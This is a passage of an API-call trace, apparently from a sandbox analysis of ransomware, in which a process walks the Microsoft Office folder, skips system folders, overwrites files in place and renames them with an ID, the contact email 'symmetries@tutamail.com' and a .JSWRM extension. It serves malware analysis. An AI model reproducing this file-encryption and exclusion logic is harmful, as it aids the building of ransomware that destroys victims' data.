hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0137.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0137.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0137.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0137.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OMML2MML.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\omml2mml.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.588] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=94908) returned 1 [0137.588] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x172b0) returned 0x2501e8 [0137.588] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x172b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x172b0, lpOverlapped=0x0) returned 1 [0137.596] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.596] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x172b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x172b0, lpOverlapped=0x0) returned 1 [0137.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0137.598] CloseHandle (hObject=0x45c) returned 1 [0137.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0137.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0137.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0137.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0137.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0137.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0137.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0137.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0137.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0137.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0137.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0137.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0137.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.598] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OMML2MML.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\omml2mml.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OMML2MML.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\omml2mml.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0137.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0137.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0137.599] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c8ab024, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf2ec8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OMSMAIN.DLL", cAlternateFileName="")) returned 1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2=".") returned 1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2="..") returned 1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2="...") returned 1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2="windows") returned -1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2="recovery") returned -1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2="perflogs") returned -1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2="documents and settings") returned 1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2="system volume information") returned -1 [0137.599] lstrcmpiW (lpString1="OMSMAIN.DLL", lpString2="msocache") returned 1 [0137.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0137.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSMAIN.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSMAIN.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSMAIN.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0137.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0137.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSMAIN.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSMAIN.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSMAIN.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0137.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0137.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0137.600] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x53ad8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OMSXP32.DLL", cAlternateFileName="")) returned 1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2=".") returned 1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2="..") returned 1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2="...") returned 1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2="windows") returned -1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2="recovery") returned -1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2="perflogs") returned -1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2="documents and settings") returned 1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2="system volume information") returned -1 [0137.600] lstrcmpiW (lpString1="OMSXP32.DLL", lpString2="msocache") returned 1 [0137.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0137.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSXP32.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSXP32.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSXP32.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0137.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0137.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSXP32.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSXP32.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSXP32.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0137.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0137.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0137.600] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x2283d0f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39078, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONBttnIE.dll", cAlternateFileName="")) returned 1 [0137.600] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2=".") returned 1 [0137.600] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="..") returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="...") returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="windows") returned -1 [0137.601] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="recovery") returned -1 [0137.601] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="perflogs") returned -1 [0137.601] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="documents and settings") returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="system volume information") returned -1 [0137.601] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="msocache") returned 1 [0137.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0137.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnIE.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnIE.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnIE.dll", lpUsedDefaultChar=0x0) returned 12 [0137.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0137.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0137.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnIE.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnIE.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnIE.dll", lpUsedDefaultChar=0x0) returned 12 [0137.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0137.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0137.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0137.601] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x316d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONBttnIELinkedNotes.dll", cAlternateFileName="ONBTTN~1.DLL")) returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2=".") returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="..") returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="...") returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="windows") returned -1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="recovery") returned -1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="perflogs") returned -1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="documents and settings") returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="system volume information") returned -1 [0137.601] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="msocache") returned 1 [0137.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnIELinkedNotes.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0137.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0137.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnIELinkedNotes.dll", cchWideChar=23, lpMultiByteStr=0x2413a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnIELinkedNotes.dll", lpUsedDefaultChar=0x0) returned 23 [0137.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnIELinkedNotes.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0137.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0137.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnIELinkedNotes.dll", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnIELinkedNotes.dll", lpUsedDefaultChar=0x0) returned 23 [0137.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0137.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0137.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0137.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0137.602] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca57b43c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca57b43c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb0cf768, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9de60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONBttnOL.dll", cAlternateFileName="")) returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2=".") returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2="..") returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2="...") returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2="windows") returned -1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2="recovery") returned -1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2="perflogs") returned -1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2="documents and settings") returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2="system volume information") returned -1 [0137.602] lstrcmpiW (lpString1="ONBttnOL.dll", lpString2="msocache") returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0137.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnOL.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnOL.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnOL.dll", lpUsedDefaultChar=0x0) returned 12 [0137.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0137.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnOL.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnOL.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnOL.dll", lpUsedDefaultChar=0x0) returned 12 [0137.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0137.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0137.602] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6164f96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x376c8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONBttnPPT.dll", cAlternateFileName="ONBTTN~2.DLL")) returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2=".") returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2="..") returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2="...") returned 1 [0137.602] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2="windows") returned -1 [0137.602] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2="recovery") returned -1 [0137.603] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2="perflogs") returned -1 [0137.603] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2="documents and settings") returned 1 [0137.603] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.603] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2="system volume information") returned -1 [0137.603] lstrcmpiW (lpString1="ONBttnPPT.dll", lpString2="msocache") returned 1 [0137.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0137.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnPPT.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnPPT.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnPPT.dll", lpUsedDefaultChar=0x0) returned 13 [0137.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0137.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0137.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnPPT.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnPPT.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnPPT.dll", lpUsedDefaultChar=0x0) returned 13 [0137.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0137.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0137.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0137.603] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x54ef2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x37c58, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONBttnWD.dll", cAlternateFileName="")) returned 1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2=".") returned 1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2="..") returned 1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2="...") returned 1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2="windows") returned -1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2="recovery") returned -1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2="perflogs") returned -1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2="documents and settings") returned 1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2="system volume information") returned -1 [0137.603] lstrcmpiW (lpString1="ONBttnWD.dll", lpString2="msocache") returned 1 [0137.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 